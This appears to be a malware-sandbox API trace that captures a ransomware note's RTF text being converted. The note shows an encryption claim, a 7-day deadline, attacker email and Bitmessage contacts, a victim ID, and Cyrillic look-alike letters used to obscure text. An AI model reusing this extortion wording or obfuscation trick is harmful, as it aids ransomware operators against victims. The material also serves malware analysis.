\\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 